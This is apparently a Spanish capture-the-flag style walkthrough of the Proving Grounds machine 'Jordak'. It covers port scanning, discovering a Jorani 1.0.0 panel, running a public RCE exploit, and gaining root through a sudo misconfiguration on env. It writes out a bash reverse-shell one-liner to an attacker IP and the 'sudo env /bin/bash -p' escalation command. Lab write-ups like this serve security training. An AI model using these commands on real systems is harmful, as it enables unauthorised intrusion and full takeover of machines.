> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-jordak-web-rce-jordani-1.0.0-+-privesc-env.md).

# MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env')

Enumere los puertos abiertos de la ip.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FACrbPLWPoMQ2QScvK4bX%2F0.png?alt=media)

```
nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn 192.168.143.109 -G Basicscan.txt
```

Realice un reconocimiento de los servicios de los puertos y un escaneo para verificar sus versiones.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fwhe6T2zhxwV0KvLwnQ2F%2F1.png?alt=media)

```
nmap -p22,80 -sCV 192.168.143.109 -oN fullscan.txt
```

Verifique el contenido del servidor web (puerto 80) y me encontré con el panel de apache por defecto.

Seguido ejecute gobuster para encontrar directorios ocultos dentro de la web.

```
gobuster dir -u http://192.168.143.109 -w /usr/share/wordlists/seclists/Discovery/We
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FnivZYXBTHHlTm1dQZED8%2F2.png?alt=media)

En el directorio sql encontré archivos con contenido interesante como el siguiente.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FYcNItUHjWgRGYzaGAYLX%2F3.png?alt=media)

Busque que era esto y encontré un panel de sesión en google.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FccGGHET257CZwupakxYe%2F4.png?alt=media)

Luego busque si en la web existe este panel de sesión, por lo que al agregarle la ruta

/session/login automáticamente me envió a esta web.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FGfUerbIdm5ZoeYJ2fQ0i%2F5.png?alt=media)

Logre identificar que abajo a la derecha esta la version de este aplicativo (jorani v 1.0.0)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FsTQW1Z7ti7N5SF6il3vR%2F6.png?alt=media)

En google busque algún exploit aprovechando la versión encontrándome con el siguiente.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FHxD0XYFRxGfT5gMQIfbr%2F7.png?alt=media)

Esta version es vulnerable a RCE, por lo en github encontré un repositorio para poder ejecutar esta vulnerabilidad.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fde4xAPktxMVjqYdFI7Jv%2F8.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FD2hllskaKFmMJbQCJNkP%2F9.png?alt=media)

Este exploit se ejecuta de la siguiente manera.

```
python3 exploit.py 
http://192.168.143.109
```

Una vez que ejecute el exploit utilice le comando 'whoami' para verificar si me devuelve una respuesta.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FDwRuj2swBjsje2PTxeCs%2F10.png?alt=media)

Como funciono atreves de una revershell establecí una conexión mas estable con mi maquina kali.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FeTwbNdnQA5Gq0FcXh2Hr%2F11.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FE4F579EPOdS6QXy0zvvP%2F12.png?alt=media)

```
bash -c "bash -i >& /dev/tcp/192.168.45.233/443 0>&1"
```

Dentro de la maquina busque información sobre ella.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FJ1fNrNx6ClgvINUV2Tpg%2F13.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F7Bj4hTPQFw3UepJEkfjz%2F14.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FQ0Fj2C7RM3hYnNx0TDjY%2F15.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F4ItckcJSsHdK5KtR8w9o%2F16.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Ff6xWTDQjVt8RSsnuUZMt%2F17.png?alt=media)

Ejecute el comando sudo -l y observe que el binario /usr/bin/env no requiere contraseñas.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fb0u1PHWuYPOlzezYbJac%2F18.png?alt=media)

En la pagina gtfobin se encuentre la forma de abusar de este binario para escalar privilegios.

```
sudo /usr/bin/env /bin/bash -p
```

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fw0OUWotr1lunzdRCM4uW%2F19.png?alt=media)

Root.
